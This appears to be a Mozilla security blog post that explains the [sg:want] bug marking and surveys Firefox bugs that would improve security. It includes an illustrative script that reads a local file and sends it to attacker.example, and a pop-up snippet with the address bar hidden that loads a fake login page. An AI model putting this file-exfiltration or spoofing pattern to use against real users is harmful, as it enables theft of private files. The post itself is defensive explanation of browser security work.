The Mozilla security group uses status whiteboard markings in bugs to indicate how severe a security hole is. For example, bugs that allow a malicious site to take over users' computers easily are labeled [sg:critical]. The severities we use (critical, high, moderate, and low) are described on the known vulnerabilities page.
Recently, Dan Veditz and I started using a new status whiteboard marking, [sg:want], to indicate that a fix would improve security even though we don't consider the bug to be a security hole. On many bugs, we use [sg:want P1] through [sg:want P5] to indicate roughly how much a fix would improve security. Currently, only one bug has P1, and eight bugs are P2. These bugs include user-interface changes, code-level changes, and entire new features.
If you think a bug should have [sg:want], you should contact me or dveditz rather than adding it yourself.
Here's a sampling of [sg:want] bugs, along with a few long-standing bugs that we do consider to be security holes:
Tighten the same-origin policy for local files.
The same-origin policy prevents web site scripts from accessing private information on other web sites or on your hard drive. But an HTML file on your hard drive is allowed to read pretty much any text, HTML, or XML file on your computer. Combined with a widespread perception that HTML files are safe to double-click on (like MP3 files and unlike EXE files), this leads to several attack scenarios.
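To make that concrete, here's a rough sketch (the file paths and server are made up) of what a script inside an HTML file can do once you've saved it to disk and double-clicked it:

    // Runs inside an HTML file opened from disk, e.g. file:///C:/Downloads/funny.html.
    // The path below is a placeholder; any readable local file would do.
    const req = new XMLHttpRequest();
    req.open("GET", "file:///C:/Documents%20and%20Settings/victim/notes.txt", false);
    req.send(null);

    // The file's contents are now in the page's hands; a malicious script could
    // smuggle them out, e.g. by encoding them into an image request to its own server.
    new Image().src = "http://attacker.example/collect?d=" +
                      encodeURIComponent(req.responseText);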
Microsoft's "solution" to this problem, introduced with Windows XP SP2, is kind of insane. Internet Explorer disable all scripts in local files, unless you click an information bar and then click "Yes" in a dialog. This breaks way too many pages, and anyone who clicks "Yes" in order to unbreak pages grants the page access to their entire filesystem.
Some types of mixed content don't trigger the "broken lock icon".
The broken lock icon is a way to alert https web site owners that they are using http content in a way that makes their sites less secure. But many things that should trigger a broken lock icon don't trigger it, so web site owners testing with Firefox aren't alerted.
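For context (the URLs are placeholders), this is the sort of thing "mixed content" means: an https page pulling in sub-resources over plain http. The bug is about loads of this kind that the lock indicator misses.

    // Two ordinary ways an https page ends up embedding plain-http content.
    const img = document.createElement("img");
    img.src = "http://static.example.com/logo.png";    // image fetched over http
    document.body.appendChild(img);

    const script = document.createElement("script");
    script.src = "http://cdn.example.com/widget.js";   // active content over http
    document.head.appendChild(script);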
Always show the address bar.
Allowing sites to hide the address bar in pop-up windows makes it possible for sites to spoof the address bar, making it appear that you're on a different site. I think Microsoft recently made Internet Explorer always show the address bar; we should too.
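For reference (made-up URL), suppressing the address bar is a one-liner for any page today:

    // Opens a pop-up with no location bar; whatever the page draws at the top
    // of that window is all the user has to go on.
    window.open("http://attacker.example/fake-login.html", "_blank",
                "location=no,width=500,height=400");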
Countermeasures for Java/plugin/extension vulnerabilities (disable, warn).
Every few months we hear a report of someone getting infected with spyware while using Firefox. It usually turns out that the user had an old version of Java, and a malicious web site exploited an old Java hole. Refusing to load old versions of Java would help a lot. (Fixing this is tricky, because each plugin presents version information in a different way, and some plugins hide version information from Firefox entirely.)
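To show why it's tricky rather than how to do it, here's an illustrative sketch (the regex and the whole approach are placeholders, not a real policy) of trying to recover a Java version from what plugins advertise:

    // Version info, when present at all, is buried in free-form name and
    // description strings, so even finding "the Java version" takes guesswork.
    for (const plugin of Array.from(navigator.plugins)) {
      const text = plugin.name + " " + plugin.description;
      const m = /Java.*?(\d+(?:\.\d+)+(?:_\d+)?)/.exec(text);
      if (m) {
        console.log("A Java plugin advertises version", m[1]);
        // A real blocklist would have to decide, from strings like this,
        // whether the installed version predates the latest security fixes.
      }
    }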
Crashes on startup with XP SP2 and a processor that supports NX aka Data Execution Prevention.
In addition to the obvious problem of preventing some people from using Firefox, this forces users to run Firefox without Data Execution Prevention, and may encourage some users to turn off DEP for all programs. DEP is a cheap measure that makes memory safety bugs harder to exploit to run arbitrary code.
Firefox should check for updates even if it doesn't have write access to itself.
Making users choose between using non-root accounts and having update notifications isn't too hot.
Safer handling of executable files with download manager.
Using "Save Link As..." followed by double-clicking the file in explorer doesn't give you any warning if the file happens to be an executable file. Unless you check the extension of every porn video you download before double-clicking it, you could get owned easily.
Explicit local root model has bad human factors.
Firefox used to have a lot of bugs called GC hazards, where newly created JavaScript engine objects would be garbage-collected prematurely, leading to dangling pointer situations. Through a combination of code auditing (mostly by Igor Bukanov) and testing with the WAY_TOO_MUCH_GC option, we've eliminated quite a few of them. But it's still too easy to make mistakes that lead to GC hazards, and there are some ideas for fixing that.
Fix all non-origin URL load processing to track origin principals.
Firefox has had quite a few vulnerabilities involving the javascript: and data: protocols, as used from chrome. This bug contains discussion of API changes that could eliminate this class of bugs.
HttpOnly cookie attribute for cross-site scripting vulnerability prevention.
IE supports an HttpOnly attribute for cookies. When servers use this attribute, cross-site scripting (XSS) security holes in web sites cannot be used to steal their cookies. This makes many attacks significantly harder to pull off and, in some cases involving subdomains, prevents them entirely.
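For reference, the server side of this is just one extra token in the Set-Cookie header. Here's a minimal sketch (hypothetical cookie value) using Node's http module:

    import { createServer } from "http";

    // In browsers that honor HttpOnly, the cookie is still sent with every
    // request, but a script injected via XSS reading document.cookie never sees it.
    createServer((req, res) => {
      res.setHeader("Set-Cookie", "SESSIONID=abc123; HttpOnly");  // placeholder value
      res.end("hello");
    }).listen(8080);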
Consider a policy for security bugs such that people scanning bonsai/cvs commit history can't immediately detect security bugs and work to build exploits.
As soon as we have a reviewed patch for a security hole, we check the fix into a public CVS repository, even if the bug report is to remain private until a fixed version is released. For many bugs, someone looking at the patch and checkin comment could figure out how to exploit the bug. He might then be able to exploit it quietly for weeks before a new version of Firefox is released, or exploit it widely and force a security firedrill.
It's not clear how to solve this problem. Keeping security fixes out of CVS and off of the trunk would severely limit the number of people who can test the fixes. This would cause regressions to be identified later, possibly delaying the release. Or worse, regressions might only be noticed after the release.